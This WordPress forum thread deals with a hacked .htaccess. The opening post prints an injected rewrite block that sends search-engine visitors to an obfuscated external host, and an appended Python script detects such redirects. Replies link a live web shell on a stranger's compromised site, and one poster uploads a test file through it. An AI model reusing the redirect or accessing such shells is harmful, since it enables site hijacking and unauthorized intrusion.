• Hello,

    I’m using the latest version of wp, i.e., v3.2.1
    Site hosted in Godaddy hosting.

    Previously my wp .htaccess was modified by someone,
    I removed the code and now again it’s modified with the same code.
    This code redirects my search engine traffic to some other website.

    I have mentioned this previously here:
    https://www.wpsecuritylock.com/wordpress-3-2-gershwin-is-released/comment-page-1/#comment-4687
    I really don’t know how it’s been done.

    Please advise me how to prevent this from happening again.

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
    RewriteRule .* http : // sokoloperkovuskeci . com / in . php ? g = 56 [R,L]
    </IfModule>
Viewing 4 replies - 46 through 49 (of 49 total)
  • And this is interesting if you want to see a hacker’s Shell script.
    https://www.myphotofolio.co.uk/myid.php

    Normally the Shell is hidden on a hacked site and you will see a 403 Forbidden error (the hackers add their own .htaccess file that only allows them access to the Shell script by IP Address or Host Name), but this one is exposed. Usually you will only see this for a couple of days before the site owner figures it out or their site gets banned.

    Thanks – I’ll keep looking.

    I have also found out since that whatever script they uploaded has altered or replaced every .htaccess file of every site under that FTP account, not just the one WordPress blog. That includes a Drupal multisite with about 40 domains on it, and probably another 30 sites or so of all different kinds. D-:

    Now I don’t even know for certain if it even started with the WordPress blog, or somewhere else. The script could be anywhere…

    Well, if you look at the ShOcKeR Area shell script above on this currently hacked website above you can see some of the things they can do with your website and your entire hosting account – pretty much anything they want – that is where the hacker term “owned” comes from.

    And yes, the Shell scripts can be anywhere, and the more advanced hacking scripts and hackers use a lot of autogeneration and remote generation scripts. That is what makes de-hacking so time consuming. You have to lock everything down and then set up monitoring and then start dissecting. As new scripts are created you need to find the source of the autogeneration scripts. It can be a really time consuming event / project.

    And just to see if this Shell is really active or not I uploaded a file to this website. I created a text file called test.txt and it was uploaded to this site successfully, so this Shell script is fully functioning.
    44235189 -rw-r--r-- 1 u40191717 ftpusers 4 Dec 3 20:35 test.txt

    https://www.myphotofolio.co.uk/test.txt

  • The topic ‘Wp .htaccess is hacked for the 2nd time’ is closed to new replies.
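
An added example, not part of the thread or any poster's code: a Python check that walks a whole hosting account and flags every .htaccess file containing the pattern from the first post, a `RewriteCond` on `%{HTTP_REFERER}` followed by a `RewriteRule` that sends the visitor to another host. The function names, the `own_hosts` allow-list and the placeholder host `redirect.example` are assumptions made for illustration.

```python
import os
import re
from urllib.parse import urlsplit

REFERER_COND = re.compile(r'^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)', re.I)
ANY_RULE = re.compile(r'^\s*RewriteRule\s+\S+\s+(\S+)', re.I)

# Constructed sample modelled on the injected block quoted in the thread;
# redirect.example is a placeholder host, not a value from the page.
SAMPLE_INFECTED = """<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC]
RewriteRule .* http://redirect.example/in.php?g=56 [R,L]
</IfModule>
"""


def scan_htaccess(text, own_hosts=()):
    """Return [(line_no, host, referer_patterns)] for referer-gated off-site redirects."""
    findings, pending = [], []
    for line_no, line in enumerate(text.splitlines(), 1):
        cond, rule = REFERER_COND.match(line), ANY_RULE.match(line)
        if cond:
            pending.append(cond.group(1))
        elif rule:
            try:
                host = urlsplit(rule.group(1)).hostname
            except ValueError:  # malformed target: not a parseable URL
                host = None
            if pending and host and host not in own_hosts:
                findings.append((line_no, host, pending))
            pending = []  # conditions only bind to the next RewriteRule
    return findings


def scan_tree(root, own_hosts=()):
    """Scan every .htaccess under root (the whole account, not just one site)."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        if '.htaccess' in files:
            path = os.path.join(dirpath, '.htaccess')
            with open(path, encoding='utf-8', errors='replace') as fh:
                found = scan_htaccess(fh.read(), own_hosts)
            if found:
                hits[path] = found
    return hits
```

Run `scan_tree()` on the account root from a scheduled job so a re-injected file is noticed quickly; a hit means the writer (web shell or stolen FTP credentials) is still present, and deleting the rule alone will not stop it.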